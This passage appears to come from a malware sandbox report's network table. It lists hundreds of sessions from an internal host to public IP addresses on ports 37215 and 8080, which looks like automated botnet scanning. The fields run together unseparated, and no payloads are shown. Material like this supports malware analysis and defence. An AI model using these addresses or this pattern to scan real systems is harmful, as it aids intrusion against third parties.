                                                        35884192.168.2.2334940157.8.242.637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35885192.168.2.2347280157.46.178.5637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35886192.168.2.2337268157.34.72.11937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35887192.168.2.2341750157.155.135.21837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35888192.168.2.2341766167.118.128.8937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35889192.168.2.235412241.144.132.437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35890192.168.2.2353878157.48.194.19137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35891192.168.2.2333980120.178.125.5137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35892192.168.2.235107241.222.54.20637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35893192.168.2.2342938197.211.10.19537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35894192.168.2.235707664.38.173.12837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35895192.168.2.2360122130.89.108.19937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35896192.168.2.235052441.88.226.21537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35897192.168.2.2345564157.99.18.11337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35898192.168.2.235096841.135.236.4737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35899192.168.2.234048251.208.41.7337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35900192.168.2.235569441.168.204.18737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35901192.168.2.234012641.55.91.21537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35902192.168.2.2339132197.29.208.23937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35903192.168.2.233681241.154.185.25237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35904192.168.2.2357860157.76.112.12737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35905192.168.2.236018893.36.233.14937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35906192.168.2.2347922157.139.122.7037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35907192.168.2.2356818157.109.135.12237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35908192.168.2.2354070197.143.145.12837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35909192.168.2.2338848126.234.155.22737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35910192.168.2.2338204157.113.126.10137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35911192.168.2.2345920197.242.192.23537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35912192.168.2.2353372157.78.5.18537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35913192.168.2.2344936201.3.137.2037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35914192.168.2.2360512157.95.244.1337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35915192.168.2.233887041.210.121.21937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35916192.168.2.235307241.49.172.7337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35917192.168.2.2350506119.204.20.14237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35918192.168.2.2336384184.142.232.20437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35919192.168.2.2360350197.174.236.18437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35920192.168.2.235321641.59.246.8537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35921192.168.2.235349041.203.38.1237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35922192.168.2.2337758197.26.64.4737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35923192.168.2.2344426203.198.122.758080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35924192.168.2.2334028112.116.182.1768080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35925192.168.2.234364048.223.211.2368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35926192.168.2.2348346106.114.153.2438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35927192.168.2.234971219.172.100.138080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35928192.168.2.235278288.23.109.78080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35929192.168.2.2344104167.104.231.1928080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35930192.168.2.235158491.119.217.1138080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35931192.168.2.2355448188.168.174.1368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35932192.168.2.23345249.132.219.1918080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35933192.168.2.2351518201.244.137.368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35934192.168.2.2356706179.13.61.558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35935192.168.2.2344236137.173.1.1928080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35936192.168.2.2351050208.29.126.1208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35937192.168.2.235097888.212.75.1298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35938192.168.2.2351264161.76.147.198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35939192.168.2.2358830176.40.60.908080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35940192.168.2.235631413.210.41.1688080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35941192.168.2.2355646207.135.174.1238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35942192.168.2.23607845.85.62.2158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35943192.168.2.235051836.47.206.1628080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35944192.168.2.2342122162.3.17.328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35945192.168.2.2333812110.44.97.788080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35946192.168.2.2356540178.52.238.1718080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35947192.168.2.2335402133.39.105.1728080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35948192.168.2.2339178126.5.221.2558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35949192.168.2.2342438123.116.168.1678080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35950192.168.2.2338578120.52.123.1018080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35951192.168.2.2359020130.40.74.2028080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35952192.168.2.2358284210.5.77.2178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35953192.168.2.2338730124.59.221.1118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35954192.168.2.234682820.75.198.2308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35955192.168.2.2339164157.241.55.418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35956192.168.2.234554497.191.156.708080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35957192.168.2.2351410184.51.37.2428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35958192.168.2.2342804129.198.109.1028080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35959192.168.2.2354398181.198.123.98080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35960192.168.2.2342046183.65.195.1928080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35961192.168.2.234791813.30.229.2108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35962192.168.2.235123086.25.76.768080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35963192.168.2.2351230112.156.196.738080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35964192.168.2.2341600199.47.11.338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35965192.168.2.2360778109.153.15.698080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35966192.168.2.23376225.219.200.388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35967192.168.2.2341804106.242.30.748080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35968192.168.2.234803060.254.43.1558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35969192.168.2.2332910166.74.219.238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35970192.168.2.234616414.132.251.1108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35971192.168.2.2349476173.171.135.548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35972192.168.2.2340412135.86.205.1828080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35973192.168.2.2352972195.221.156.1948080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35974192.168.2.2337678100.220.196.258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35975192.168.2.233402820.121.94.868080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35976192.168.2.234724279.73.112.1378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35977192.168.2.234701277.99.210.448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35978192.168.2.2352528125.151.203.2368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35979192.168.2.235541836.89.211.2018080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35980192.168.2.234374298.199.162.2508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35981192.168.2.2351206165.108.80.1998080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35982192.168.2.2335262211.232.33.2208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35983192.168.2.234696873.194.13.278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35984192.168.2.2357888205.122.123.08080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35985192.168.2.2334230116.102.142.2488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35986192.168.2.234298893.30.166.2098080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35987192.168.2.2356168149.238.159.1148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35988192.168.2.2335090136.205.32.588080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35989192.168.2.2345528217.184.139.1048080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35990192.168.2.2360992103.164.5.1648080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35991192.168.2.2351534103.10.103.708080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35992192.168.2.2338626182.139.60.2428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35993192.168.2.2340094125.62.143.2368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35994192.168.2.2357770200.85.152.1228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35995192.168.2.236079678.204.109.118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35996192.168.2.2344772104.172.188.2448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35997192.168.2.235247290.199.230.2068080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35998192.168.2.234841634.254.85.1818080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35999192.168.2.2338374146.159.32.458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36000192.168.2.2340544203.46.56.128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36001192.168.2.234639013.180.87.1388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36002192.168.2.2338184207.19.20.348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36003192.168.2.2351744202.86.214.2208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36004192.168.2.2348004107.252.248.1358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36005192.168.2.236011291.31.46.678080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36006192.168.2.2358656149.197.30.2028080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36007192.168.2.23411045.224.247.1978080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36008192.168.2.235438251.114.108.2138080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36009192.168.2.233402493.32.219.688080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36010192.168.2.235503076.230.33.2198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36011192.168.2.2356258111.130.127.1038080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36012192.168.2.2359762205.47.8.18080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36013192.168.2.2346114137.73.134.1858080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36014192.168.2.234955862.217.25.638080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36015192.168.2.2334038191.221.235.988080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36016192.168.2.234135881.255.83.378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36017192.168.2.2339432173.184.72.68080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36018192.168.2.2353662174.214.10.2098080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36019192.168.2.2334432123.10.236.2268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36020192.168.2.2353614164.10.196.1468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36021192.168.2.2338004126.240.119.1068080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36022192.168.2.2337896181.70.167.1928080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36023192.168.2.2352074190.235.152.1498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36024192.168.2.2337986149.100.54.1188080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36025192.168.2.2347996147.23.84.578080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36026192.168.2.2340102114.1.247.1148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36027192.168.2.2346888156.66.89.1718080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36028192.168.2.234230224.166.78.78080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36029192.168.2.233378880.77.156.2028080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36030192.168.2.23490341.109.250.1938080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36031192.168.2.23465905.106.182.298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36032192.168.2.2335730177.213.185.1668080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36033192.168.2.2347776126.221.41.658080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36034192.168.2.2343602147.125.85.368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36035192.168.2.2357496177.177.153.1238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36036192.168.2.233756418.29.121.1358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36037192.168.2.2356214172.217.83.1878080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36038192.168.2.2352650139.204.241.2378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36039192.168.2.235782661.41.68.2198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36040192.168.2.2335600139.82.53.78080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36041192.168.2.2350402145.13.214.2298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36042192.168.2.2347062103.84.10.688080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36043192.168.2.2344754135.17.220.1728080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36044192.168.2.234440894.224.174.238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36045192.168.2.233405623.99.216.1498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36046192.168.2.2339058207.149.96.358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36047192.168.2.234541414.232.253.1888080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36048192.168.2.2360524120.145.232.1268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36049192.168.2.2347622131.174.23.1608080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36050192.168.2.2333122152.78.90.1798080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36051192.168.2.2338588171.223.235.2438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36052192.168.2.2337954120.246.206.1518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36053192.168.2.235991613.20.197.58080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36054192.168.2.2348722223.110.130.1068080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36055192.168.2.2334358178.87.24.178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36056192.168.2.234208217.180.69.1268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36057192.168.2.234025066.37.222.1528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36058192.168.2.2332922187.50.204.2538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36059192.168.2.2353762126.16.112.138080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36060192.168.2.235320683.6.193.1258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36061192.168.2.236056684.210.236.988080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36062192.168.2.2345246154.188.35.2308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36063192.168.2.2352336177.178.152.2088080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36064192.168.2.235847091.173.98.2018080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36065192.168.2.2337320208.13.83.1928080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36066192.168.2.235289438.10.161.38080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36067192.168.2.235177483.180.16.1448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36068192.168.2.2342402158.206.65.2548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36069192.168.2.2358716182.148.103.2128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36070192.168.2.2339372159.223.70.798080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36071192.168.2.233446680.148.27.758080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36072192.168.2.233618449.21.74.508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36073192.168.2.2359474222.241.141.2408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36074192.168.2.2340360151.147.213.2068080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36075192.168.2.2338784142.199.20.2078080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36076192.168.2.234951474.45.99.1058080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36077192.168.2.2337620170.125.139.238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36078192.168.2.2357026137.68.89.418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36079192.168.2.2354544150.217.244.2098080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36080192.168.2.234554438.79.116.6737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36081192.168.2.2347454157.20.54.16637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36082192.168.2.2340854197.84.34.19637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36083192.168.2.2341812157.29.162.25337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36084192.168.2.2351916131.80.253.3237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36085192.168.2.2350848157.250.252.14537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36086192.168.2.2350944157.254.241.24137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36087192.168.2.2334398193.104.244.237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36088192.168.2.233633041.228.211.9237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36089192.168.2.235765841.61.164.12337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36090192.168.2.2336572197.185.223.18737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36091192.168.2.233642841.143.110.20437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36092192.168.2.235894041.53.171.4037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36093192.168.2.234425641.180.172.11337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
